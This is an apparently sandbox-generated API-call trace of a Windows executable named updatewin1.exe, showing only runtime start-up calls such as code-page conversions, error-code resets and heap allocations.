!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ[\x1f6o\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0178.345] GetLastError () returned 0x0 [0178.345] SetLastError (dwErrCode=0x0) [0178.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ") returned 256 [0178.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0178.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0178.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ[\x1f6o\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0178.346] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe")) returned 0x5f [0178.346] GetLastError () returned 0x0 [0178.346] SetLastError (dwErrCode=0x0) [0178.346] GetLastError () returned 0x0 [0178.346] SetLastError (dwErrCode=0x0) [0178.346] GetLastError () returned 0x0 [0178.346] SetLastError (dwErrCode=0x0) [0178.346] GetLastError () returned 0x0 [0178.346] SetLastError (dwErrCode=0x0) [0178.346] GetLastError () returned 0x0 [0178.346] SetLastError (dwErrCode=0x0) [0178.346] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.347] GetLastError () returned 0x0 [0178.347] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.348] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.348] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.348] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.348] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.348] SetLastError (dwErrCode=0x0) [0178.348] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.349] SetLastError (dwErrCode=0x0) [0178.349] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.350] SetLastError (dwErrCode=0x0) [0178.350] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.351] SetLastError (dwErrCode=0x0) [0178.351] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.352] GetLastError () returned 0x0 [0178.352] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.353] SetLastError (dwErrCode=0x0) [0178.353] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.354] GetLastError () returned 0x0 [0178.354] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.355] GetLastError () returned 0x0 [0178.355] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.356] SetLastError (dwErrCode=0x0) [0178.356] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.357] GetLastError () returned 0x0 [0178.357] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.358] SetLastError (dwErrCode=0x0) [0178.358] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x68) returned 0x581990 [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.359] SetLastError (dwErrCode=0x0) [0178.359] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.360] SetLastError (dwErrCode=0x0) [0178.360] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.361] SetLastError (dwErrCode=0x0) [0178.361] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.362] SetLastError (dwErrCode=0x0) [0178.362] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.363] SetLastError (dwErrCode=0x0) [0178.363] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.364] SetLastError (dwErrCode=0x0) [0178.364] GetLastError () returned 0x0 [0178.365] SetLastError (dwErrCode=0x0) [0178.365] GetLastError () returned 0x0 [0178.365] SetLastError (dwErrCode=0x0) [0178.365] GetLastError () returned 0x0 [0178.365] SetLastError (dwErrCode=0x0) [0178.365] GetLastError () returned 0x0 [0178.365] SetLastError (dwErrCode=0x0) [0178.365] GetLastError () returned 0x0 [0178.365] SetLastError (dwErrCode=0x0) [0178.365] GetLastError () returned 0x0 [0178.367] SetLastError (dwErrCode=0x0) [0178.367] GetLastError () returned 0x0 [0178.367] SetLastError (dwErrCode=0x0) [0178.367] GetLastError () returned 0x0 [0178.367] SetLastError (dwErrCode=0x0) [0178.367] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.368] SetLastError (dwErrCode=0x0) [0178.368] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.369] SetLastError (dwErrCode=0x0) [0178.369] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.370] GetLastError () returned 0x0 [0178.370] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.371] SetLastError (dwErrCode=0x0) [0178.371] GetLastError () returned 0x0 [0178.372] SetLastError (dwErrCode=0x0) [0178.372] GetLastError () returned 0x0 [0178.372] SetLastError (dwErrCode=0x0) [0178.372] GetLastError () returned 0x0 [0178.372] SetLastError (dwErrCode=0x0) [0178.372] GetLastError () returned 0x0 [0178.372] SetLastError (dwErrCode=0x0) [0178.372] GetLastError () returned 0x0 [0178.372] SetLastError (dwErrCode=0x0) [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x98) returned 0x581a00 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1f) returned 0x581aa0 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x581ac8 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x37) returned 0x581b08 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x581b48 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x31) returned 0x581b90 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x17) returned 0x581bd0 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x581bf0 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x14) returned 0x581c20 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd) returned 0x581c40 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x25) returned 0x581c58 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x39) returned 0x581c88 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x581cd0 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x17) returned 0x581cf0 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xe) returned 0x581d10 [0178.372] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x69) returned 0x581d28 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3e) returned 0x581da0 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1b) returned 0x581de8 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1d) returned 0x581e10 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x581e38 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x12) returned 0x581e88 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x581ea8 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1b) returned 0x581ec8 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x581ef0 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x29) returned 0x581f20 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x581f58 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x41) returned 0x581f80 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x17) returned 0x581fd0 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xf) returned 0x581ff0 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x16) returned 0x582008 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x582028 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x29) returned 0x582060 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x15) returned 0x582098 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x5820b8 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x5820e0 [0178.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x12) returned 0x582118 [0178.374] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x582138 [0178.374] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x46) returned 0x582158 [0178.374] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5811f8 | out: hHeap=0x580000) returned 1 [0178.375] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x5821a8 [0178.375] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x80) returned 0x5811f8 [0178.375] SetUnhandledExceptionFilter 